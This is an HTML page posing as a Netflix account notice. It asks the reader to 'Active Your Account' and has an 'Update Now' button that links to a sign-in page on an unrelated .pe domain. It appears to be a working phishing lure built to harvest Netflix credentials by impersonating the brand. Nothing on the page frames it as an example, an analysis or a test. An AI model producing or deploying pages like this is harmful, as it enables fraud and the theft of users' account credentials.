<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Netflix</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #f8f8f8;
            margin: 0;
            padding: 0;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
        }
        .container {
            background-color: #fff;
            padding: 20px;
            border-radius: 8px;
            box-shadow: 0 2px 4px rgba(0, 0, 0, 0.1);
            width: 300px;
            text-align: center;
        }
        h1 {
            margin-top: 0;
        }
        p {
            margin-bottom: 20px;
        }
        .logo {
            max-width: 250px;
            margin: 0 auto;
        }
        button {
            background-color: #000080;
            color: #fff;
            border: none;
            padding: 10px 20px;
            border-radius: 4px;
            width: 100%;
            cursor: pointer;
        }
    </style>
</head>
<body>
    <div class="container">
        <img class="logo" src="https://seeklogo.com/images/N/netflix-logo-B24AFC06E5-seeklogo.com.png" alt="NETFLIX Logo">
        <h1>Please Active Your Account</h1>
          <P style="FONT-SIZE: medium; MARGIN-BOTTOM: 20px; FONT-FAMILY: Arial, sans-serif; WHITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR: rgb(0,0,0); FONT-STYLE: normal; TEXT-ALIGN: center; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: normal; TEXT-INDENT: 0px; font-variant-ligatures: normal; font-variant-caps: normal; -webkit-text-stroke-width: 0px; text-decoration-thickness: initial; text-decoration-style: initial; text-decoration-color: initial">Click the button below to Active Your Account:</P>
        <a href="https://revivir.pe/nets/1/signin.php" target="_blank">
            <BUTTON style="CURSOR: pointer; BORDER-TOP: medium none; BORDER-RIGHT: medium none; WIDTH: 300px; BORDER-BOTTOM: medium none; COLOR: rgb(255,255,255); PADDING-BOTTOM: 10px; PADDING-TOP: 10px; PADDING-LEFT: 20px; BORDER-LEFT: medium none; PADDING-RIGHT: 20px; BACKGROUND-COLOR: rgb(229,9,20); border-radius: 4px">Update Now</BUTTON></A></P>
        </a>
    </div>
</body>
</html>
